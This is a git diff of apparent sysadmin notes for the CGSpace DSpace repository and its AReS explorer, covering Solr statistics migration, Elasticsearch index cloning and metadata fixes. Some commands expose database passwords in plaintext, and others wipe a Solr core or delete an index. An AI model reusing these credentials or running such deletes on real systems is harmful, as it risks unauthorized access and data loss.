</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT item_id,uuid FROM item WHERE in_archive='t' AND withdrawn='f' AND item_id IS NOT NULL) TO /tmp/2020-11-22-item-id2uuid.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT item_id,uuid FROM item WHERE in_archive=&#39;t&#39; AND withdrawn=&#39;f&#39; AND item_id IS NOT NULL) TO /tmp/2020-11-22-item-id2uuid.csv WITH CSV HEADER;
COPY 87411
</code></pre><ul>
<li>Saving some notes I wrote down about faceting by community and collection in Solr, for potential use in the future in the DSpace Statistics API</li>
@ -688,11 +688,11 @@ COPY 87411
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ xml sel -t -m '//value-pairs[@value-pairs-name=&quot;ilrisubject&quot;]/pair/displayed-value/text()' -c '.' -n dspace/config/input-forms.xml
<pre tabindex="0"><code>$ xml sel -t -m &#39;//value-pairs[@value-pairs-name=&#34;ilrisubject&#34;]/pair/displayed-value/text()&#39; -c &#39;.&#39; -n dspace/config/input-forms.xml
</code></pre><ul>
<li>IWMI sent me a few new ORCID identifiers so I combined them with our existing ones as well as another ILRI one that Tezira asked me to update, filtered the unique ones, and then resolved their names using my <code>resolve-orcids.py</code> script:</li>
</ul>
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt /tmp/hung.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2020-11-30-combined-orcids.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt /tmp/hung.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2020-11-30-combined-orcids.txt
$ ./resolve-orcids.py -i /tmp/2020-11-30-combined-orcids.txt -o /tmp/2020-11-30-combined-orcids-names.txt -d
# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
@ -701,15 +701,15 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
</ul>
<pre tabindex="0"><code>$ cat 2020-11-30-fix-hung-orcid.csv
cg.creator.id,correct
&quot;Hung Nguyen-Viet: 0000-0001-9877-0596&quot;,&quot;Hung Nguyen-Viet: 0000-0003-1549-2733&quot;
&quot;Adriana Tofiño: 0000-0001-7115-7169&quot;,&quot;Adriana Tofiño Rivera: 0000-0001-7115-7169&quot;
&quot;Cristhian Puerta Rodriguez: 0000-0001-5992-1697&quot;,&quot;David Puerta: 0000-0001-5992-1697&quot;
&quot;Ermias Betemariam: 0000-0002-1955-6995&quot;,&quot;Ermias Aynekulu: 0000-0002-1955-6995&quot;
&quot;Hirut Betaw: 0000-0002-1205-3711&quot;,&quot;Betaw Hirut: 0000-0002-1205-3711&quot;
&quot;Megan Zandstra: 0000-0002-3326-6492&quot;,&quot;Megan McNeil Zandstra: 0000-0002-3326-6492&quot;
&quot;Tolu Eyinla: 0000-0003-1442-4392&quot;,&quot;Toluwalope Emmanuel: 0000-0003-1442-4392&quot;
&quot;VInay Nangia: 0000-0001-5148-8614&quot;,&quot;Vinay Nangia: 0000-0001-5148-8614&quot;
$ ./fix-metadata-values.py -i 2020-11-30-fix-hung-orcid.csv -db dspace63 -u dspacetest -p 'dom@in34sniper' -f cg.creator.id -t 'correct' -m 240
&#34;Hung Nguyen-Viet: 0000-0001-9877-0596&#34;,&#34;Hung Nguyen-Viet: 0000-0003-1549-2733&#34;
&#34;Adriana Tofiño: 0000-0001-7115-7169&#34;,&#34;Adriana Tofiño Rivera: 0000-0001-7115-7169&#34;
&#34;Cristhian Puerta Rodriguez: 0000-0001-5992-1697&#34;,&#34;David Puerta: 0000-0001-5992-1697&#34;
&#34;Ermias Betemariam: 0000-0002-1955-6995&#34;,&#34;Ermias Aynekulu: 0000-0002-1955-6995&#34;
&#34;Hirut Betaw: 0000-0002-1205-3711&#34;,&#34;Betaw Hirut: 0000-0002-1205-3711&#34;
&#34;Megan Zandstra: 0000-0002-3326-6492&#34;,&#34;Megan McNeil Zandstra: 0000-0002-3326-6492&#34;
&#34;Tolu Eyinla: 0000-0003-1442-4392&#34;,&#34;Toluwalope Emmanuel: 0000-0003-1442-4392&#34;
&#34;VInay Nangia: 0000-0001-5148-8614&#34;,&#34;Vinay Nangia: 0000-0001-5148-8614&#34;
$ ./fix-metadata-values.py -i 2020-11-30-fix-hung-orcid.csv -db dspace63 -u dspacetest -p &#39;dom@in34sniper&#39; -f cg.creator.id -t &#39;correct&#39; -m 240
</code></pre><!-- raw HTML omitted -->

View File

@ -36,7 +36,7 @@ I started processing those (about 411,000 records):
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -132,8 +132,8 @@ I started processing those (about 411,000 records):
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t <span style="color:#ae81ff">12</span> -c statistics-2015
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t <span style="color:#ae81ff">12</span> -c statistics-2015
</span></span></code></pre></div><ul>
<li>AReS went down when the <code>renew-letsencrypt</code> service stopped the <code>angular_nginx</code> container in the pre-update hook and failed to bring it back up
<ul>
<li>I ran all system updates on the host and rebooted it and AReS came back up OK</li>
@ -153,7 +153,7 @@ I started processing those (about 411,000 records):
</ul>
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o statistics-2010.json -k uid
$ ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
$ curl -s &quot;http://localhost:8081/solr/statistics-2010/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&quot;
$ curl -s &#34;http://localhost:8081/solr/statistics-2010/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&#34;
</code></pre><ul>
<li>I deployed Tomcat 7.0.107 on DSpace Test (CGSpace is still Tomcat 7.0.104)</li>
<li>I finished migrating all the statistics from the yearly shards back to the main core</li>
@ -179,21 +179,21 @@ $ curl -s &quot;http://localhost:8081/solr/statistics-2010/update?softCommit=tru
<ul>
<li>First the 2010 core:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o statistics-2010.json -k uid
$ chrt -b <span style="color:#ae81ff">0</span> ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2010/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o statistics-2010.json -k uid
</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2010/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><ul>
<li>Judging by the DSpace logs all these cores had a problem starting up in the last month:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># grep -rsI <span style="color:#e6db74">&#34;Unable to create core&#34;</span> <span style="color:#f92672">[</span>dspace<span style="color:#f92672">]</span>/log/dspace.log.2020-* | grep -o -E <span style="color:#e6db74">&#34;statistics-[0-9]+&#34;</span> | sort | uniq -c
24 statistics-2010
24 statistics-2015
18 statistics-2016
6 statistics-2018
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># grep -rsI <span style="color:#e6db74">&#34;Unable to create core&#34;</span> <span style="color:#f92672">[</span>dspace<span style="color:#f92672">]</span>/log/dspace.log.2020-* | grep -o -E <span style="color:#e6db74">&#34;statistics-[0-9]+&#34;</span> | sort | uniq -c
</span></span><span style="display:flex;"><span> 24 statistics-2010
</span></span><span style="display:flex;"><span> 24 statistics-2015
</span></span><span style="display:flex;"><span> 18 statistics-2016
</span></span><span style="display:flex;"><span> 6 statistics-2018
</span></span></code></pre></div><ul>
<li>The message is always this:</li>
</ul>
<pre tabindex="0"><code>org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error CREATEing SolrCore 'statistics-2016': Unable to create core [statistics-2016] Caused by: Lock obtain timed out: NativeFSLock@/[dspace]/solr/statistics-2016/data/index/write.lock
<pre tabindex="0"><code>org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error CREATEing SolrCore &#39;statistics-2016&#39;: Unable to create core [statistics-2016] Caused by: Lock obtain timed out: NativeFSLock@/[dspace]/solr/statistics-2016/data/index/write.lock
</code></pre><ul>
<li>I will migrate all these cores and see if it makes a difference, then probably end up migrating all of them
<ul>
@ -223,9 +223,9 @@ $ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics
<ul>
<li>There are apparently 1,700 locks right now:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
1739
</code></pre></div><h2 id="2020-12-08">2020-12-08</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>1739
</span></span></code></pre></div><h2 id="2020-12-08">2020-12-08</h2>
<ul>
<li>Atmire sent some instructions for using the DeduplicateValuesProcessor
<ul>
@ -233,7 +233,7 @@ $ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics
</ul>
</li>
</ul>
<pre tabindex="0"><code>Record uid: 64387815-d9a7-4605-8024-1c0a5c7520e0 couldn't be processed
<pre tabindex="0"><code>Record uid: 64387815-d9a7-4605-8024-1c0a5c7520e0 couldn&#39;t be processed
com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: 64387815-d9a7-4605-8024-1c0a5c7520e0, an error occured in the com.atmire.statistics.util.update.atomic.processor.DeduplicateValuesProcessor
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(SourceFile:304)
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:176)
@ -341,22 +341,22 @@ Caused by: org.apache.http.TruncatedChunkException: Truncated chunk ( expected s
<ul>
<li>I can see it in the <code>openrxv-items-final</code> index:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final/_count?q=*&#39;</span> | json_pp
{
&#34;_shards&#34; : {
&#34;failed&#34; : 0,
&#34;skipped&#34; : 0,
&#34;successful&#34; : 1,
&#34;total&#34; : 1
},
&#34;count&#34; : 299922
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final/_count?q=*&#39;</span> | json_pp
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span> &#34;count&#34; : 299922
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
<li>I filed a bug on OpenRXV: <a href="https://github.com/ilri/OpenRXV/issues/64">https://github.com/ilri/OpenRXV/issues/64</a></li>
<li>For now I will try to delete the index and start a re-harvest in the Admin UI:</li>
</ul>
<pre tabindex="0"><code>$ curl -XDELETE http://localhost:9200/openrxv-items-final
{&quot;acknowledged&quot;:true}%
{&#34;acknowledged&#34;:true}%
</code></pre><ul>
<li>Moayad said he&rsquo;s working on the harvesting so I stopped it for now to re-deploy his latest changes</li>
<li>I updated Tomcat to version 7.0.107 on CGSpace (linode18), ran all updates, and restarted the server</li>
@ -371,8 +371,8 @@ $ curl -XDELETE http://localhost:9200/openrxv-items-temp
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; SELECT * FROM metadatavalue WHERE metadata_field_id=28 AND text_value ~ &#39;^.*on 2020-[0-9]{2}-*&#39;;
</code></pre></div><h2 id="2020-12-14">2020-12-14</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; SELECT * FROM metadatavalue WHERE metadata_field_id=28 AND text_value ~ &#39;^.*on 2020-[0-9]{2}-*&#39;;
</span></span></code></pre></div><h2 id="2020-12-14">2020-12-14</h2>
<ul>
<li>The re-harvesting finished last night on AReS but there are no records in the <code>openrxv-items-final</code> index
<ul>
@ -380,62 +380,62 @@ $ curl -XDELETE http://localhost:9200/openrxv-items-temp
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&#39;</span> | json_pp
{
&#34;count&#34; : 99992,
&#34;_shards&#34; : {
&#34;skipped&#34; : 0,
&#34;total&#34; : 1,
&#34;failed&#34; : 0,
&#34;successful&#34; : 1
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&#39;</span> | json_pp
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 99992,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
<li>I&rsquo;m going to try to <a href="https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-clone-index.html">clone</a> the temp index to the final one&hellip;
<ul>
<li>First, set the <code>openrxv-items-temp</code> index to block writes (read only) and then clone it to <code>openrxv-items-final</code>:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-final
{&#34;acknowledged&#34;:true,&#34;shards_acknowledged&#34;:true,&#34;index&#34;:&#34;openrxv-items-final&#34;}
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-final
</span></span><span style="display:flex;"><span>{&#34;acknowledged&#34;:true,&#34;shards_acknowledged&#34;:true,&#34;index&#34;:&#34;openrxv-items-final&#34;}
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</span></span></code></pre></div><ul>
<li>Now I see that the <code>openrxv-items-final</code> index has items, but there are still none in AReS Explorer UI!</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 99992,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 99992,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
<li>The api logs show this from last night after the harvesting:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">[Nest] 92 - 12/13/2020, 1:58:52 PM [HarvesterService] Starting Harvest
[Nest] 92 - 12/13/2020, 10:50:20 PM [FetchConsumer] OnGlobalQueueDrained
[Nest] 92 - 12/13/2020, 11:00:20 PM [PluginsConsumer] OnGlobalQueueDrained
[Nest] 92 - 12/13/2020, 11:00:20 PM [HarvesterService] reindex function is called
(node:92) UnhandledPromiseRejectionWarning: ResponseError: index_not_found_exception
at IncomingMessage.&lt;anonymous&gt; (/backend/node_modules/@elastic/elasticsearch/lib/Transport.js:232:25)
at IncomingMessage.emit (events.js:326:22)
at endReadableNT (_stream_readable.js:1223:12)
at processTicksAndRejections (internal/process/task_queues.js:84:21)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>[Nest] 92 - 12/13/2020, 1:58:52 PM [HarvesterService] Starting Harvest
</span></span><span style="display:flex;"><span>[Nest] 92 - 12/13/2020, 10:50:20 PM [FetchConsumer] OnGlobalQueueDrained
</span></span><span style="display:flex;"><span>[Nest] 92 - 12/13/2020, 11:00:20 PM [PluginsConsumer] OnGlobalQueueDrained
</span></span><span style="display:flex;"><span>[Nest] 92 - 12/13/2020, 11:00:20 PM [HarvesterService] reindex function is called
</span></span><span style="display:flex;"><span>(node:92) UnhandledPromiseRejectionWarning: ResponseError: index_not_found_exception
</span></span><span style="display:flex;"><span> at IncomingMessage.&lt;anonymous&gt; (/backend/node_modules/@elastic/elasticsearch/lib/Transport.js:232:25)
</span></span><span style="display:flex;"><span> at IncomingMessage.emit (events.js:326:22)
</span></span><span style="display:flex;"><span> at endReadableNT (_stream_readable.js:1223:12)
</span></span><span style="display:flex;"><span> at processTicksAndRejections (internal/process/task_queues.js:84:21)
</span></span></code></pre></div><ul>
<li>But I&rsquo;m not sure why the frontend doesn&rsquo;t show any data despite there being documents in the index&hellip;</li>
<li>I talked to Moayad and he reminded me that OpenRXV uses an alias to point to temp and final indexes, but the UI actually uses the <code>openrxv-items</code> index</li>
<li>I cloned the <code>openrxv-items-final</code> index to <code>openrxv-items</code> index and now I see items in the explorer UI</li>
<li>The PDF report was broken and I looked in the API logs and saw this:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">(node:94) UnhandledPromiseRejectionWarning: Error: Error: Could not find soffice binary
at ExportService.downloadFile (/backend/dist/export/services/export/export.service.js:51:19)
at processTicksAndRejections (internal/process/task_queues.js:97:5)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>(node:94) UnhandledPromiseRejectionWarning: Error: Error: Could not find soffice binary
</span></span><span style="display:flex;"><span> at ExportService.downloadFile (/backend/dist/export/services/export/export.service.js:51:19)
</span></span><span style="display:flex;"><span> at processTicksAndRejections (internal/process/task_queues.js:97:5)
</span></span></code></pre></div><ul>
<li>I installed <code>unoconv</code> in the backend api container and now it works&hellip; but I wonder why this changed&hellip;</li>
<li>Skype with Abenet and Peter to discuss AReS that will be shown to ILRI scientists this week
<ul>
@ -457,11 +457,11 @@ $ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'https://cgspace.cgiar.org/rest/collections/defee001-8cc8-4a6c-8ac8-21bb5adab2db?expand=all&amp;limit=100&amp;offset=0' | json_pp &gt; /tmp/policy1.json
$ http --print b 'https://cgspace.cgiar.org/rest/collections/defee001-8cc8-4a6c-8ac8-21bb5adab2db?expand=all&amp;limit=100&amp;offset=100' | json_pp &gt; /tmp/policy2.json
$ query-json '.items | length' /tmp/policy1.json
<pre tabindex="0"><code>$ http --print b &#39;https://cgspace.cgiar.org/rest/collections/defee001-8cc8-4a6c-8ac8-21bb5adab2db?expand=all&amp;limit=100&amp;offset=0&#39; | json_pp &gt; /tmp/policy1.json
$ http --print b &#39;https://cgspace.cgiar.org/rest/collections/defee001-8cc8-4a6c-8ac8-21bb5adab2db?expand=all&amp;limit=100&amp;offset=100&#39; | json_pp &gt; /tmp/policy2.json
$ query-json &#39;.items | length&#39; /tmp/policy1.json
100
$ query-json '.items | length' /tmp/policy2.json
$ query-json &#39;.items | length&#39; /tmp/policy2.json
32
</code></pre><ul>
<li>I realized that the issue of missing/duplicate items in AReS might be because of this <a href="https://jira.lyrasis.org/browse/DS-3849">REST API bug that causes /items to return items in non-deterministic order</a></li>
@ -487,10 +487,10 @@ $ query-json '.items | length' /tmp/policy2.json
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-2020-12-14
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</code></pre></div><h2 id="2020-12-15">2020-12-15</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-2020-12-14
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</span></span></code></pre></div><h2 id="2020-12-15">2020-12-15</h2>
<ul>
<li>After the re-harvest last night there were 200,000 items in the <code>openrxv-items-temp</code> index again
<ul>
@ -499,36 +499,36 @@ $ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp
</li>
<li>I checked the 1,534 fixes in Open Refine (had to fix a few UTF-8 errors, as always from Peter&rsquo;s CSVs) and then applied them using the <code>fix-metadata-values.py</code> script:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./fix-metadata-values.py -i /tmp/2020-10-28-fix-1534-Authors.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.contributor.author -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">3</span>
$ ./delete-metadata-values.py -i /tmp/2020-10-28-delete-2-Authors.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.contributor.author -m <span style="color:#ae81ff">3</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./fix-metadata-values.py -i /tmp/2020-10-28-fix-1534-Authors.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.contributor.author -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">3</span>
</span></span><span style="display:flex;"><span>$ ./delete-metadata-values.py -i /tmp/2020-10-28-delete-2-Authors.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.contributor.author -m <span style="color:#ae81ff">3</span>
</span></span></code></pre></div><ul>
